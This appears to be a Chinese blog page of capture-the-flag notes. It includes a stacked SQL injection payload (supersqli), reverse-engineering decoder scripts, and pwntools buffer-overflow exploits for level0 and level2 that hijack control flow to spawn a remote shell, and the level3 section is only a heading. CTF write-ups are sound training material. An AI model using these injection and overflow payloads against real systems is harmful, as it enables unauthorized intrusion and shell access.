date
Aug 5, 2021 12:17 PM
Related to 日程数据 1 (blog)
tags
slug
summary
icon
category
password
0x0e supersqli
因为select被过滤了,所以先将select * from1919810931114514进行16进制编码 再通过构造payload得 ;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;# 进而得到flag prepare…from…是预处理语句,会进行编码转换。 execute用来执行由SQLPrepare创建的SQL语句。 SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
open-source
#include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsigned int first = atoi(argv[1]); if (first != 0xcafe) { printf("you are wrong, sorry.\n"); exit(2); } unsigned int second = atoi(argv[2]); if (second % 5 == 3 || second % 17 != 8) { printf("ha, you won't get it!\n"); exit(3); } if (strcmp("h4cky0u", argv[3])) { printf("so close, dude!\n"); exit(4); } printf("Brr wrrr grr\n"); unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207; printf("Get your key: "); printf("%x\n", hash); return 0; }
atoi (表示ascii to integer)
./string 51966 25 h4cky0u或者 去判断
#include <stdio.h> #include <string.h> int main() { unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207; printf("Get your key: "); printf("%x\n", hash); return 0; }
hello ctf
simple-unpack
这是有壳啊
logmein
适量N
var28="harambe" var20=":\"AL_RT^L*.?+6/46" flag="" for i in range(len(var20)): f = ord(var20[i]) ^ ord(var28[i%7]) flag +=chr(f) print(flag)
no-strings-attached
X追踪一下
要解密
buf =[ 0x3a,0x14,0x00,0x00,0x36,0x14,0x00,0x00,0x37,0x14,0x00,0x00,0x3b,0x14,0x00, 0x00,0x80,0x14,0x00,0x00,0x7a,0x14,0x00,0x00,0x71,0x14, 0x00,0x00,0x78,0x14,0x00,0x00,0x63,0x14,0x00,0x00,0x66, 0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x67,0x14,0x00,0x00, 0x62,0x14,0x00,0x00,0x65,0x14,0x00,0x00,0x73,0x14,0x00, 0x00,0x60,0x14,0x00,0x00,0x6b,0x14,0x00,0x00,0x71,0x14, 0x00,0x00,0x78,0x14,0x00,0x00,0x6a,0x14,0x00,0x00,0x73, 0x14,0x00,0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00, 0x78,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x70,0x14,0x00, 0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,0x70,0x14, 0x00,0x00,0x64,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x7b, 0x14,0x00,0x00,0x76,0x14,0x00,0x00,0x78,0x14,0x00,0x00, 0x6a,0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x7b,0x14,0x00, 0x00,0x80,0x14,0x00,0x00] f=[] for i in range(0,len(buf),4): f.append(buf[i]) print(f) fl="" nu=[1,2,3,4,5] for j in range(len(f)): fl += chr(f[j]-nu[j%5]) print(fl)
getit
s = 'c61b68366edeb7bdce3c6820314b7498' flag = '' for i in range(len(s)): if i & 1: t = 1 else: t = -1 flag += chr(ord(s[i]) + t) print (flag) #得出结果: b70c59275fcfa8aebf2d5911223c6589
csaw2013reversing2
打开是必须勾选以写入模式加载
参考
EasyRE
看见奇怪的东西
是个幌子
逆向算法
翻车
level0
没啥东西
有提示 点进去
可以输入0x200的东西 but *buf的长度为0x80
from pwn import * r = remote("111.200.241.244",58379) # 服务器 payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596) #0x80的大小加leave的0x8 改写ret为callsystem的头 r.recvuntil("Hello, World\n") #等待指定字符 p.recv() #接收输出 r.sendline(payload) #发送payload r.interactive() #交互
level2
漏洞函数在前
0x88 可被0x100覆盖溢出
找想要跳的add system 函数
0x08048320
需要system('/bin/shell') 找到字符
0x0804a024
构建pyalod
payload=b'a'*(0x88+0x4)+p32(
0x08048320)+p32(0)+p32(0x0804a024)
from pwn import * p = remote('111.200.241.244', 60256) #payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804A024) #call system的地址 payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024) #p.recvuntil("Input:\n") p.recv() p.sendline(payload) p.interactive()
两种方式都可以
level3
- 作者:lea
- 链接:https://bear4.ml/article/web2
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
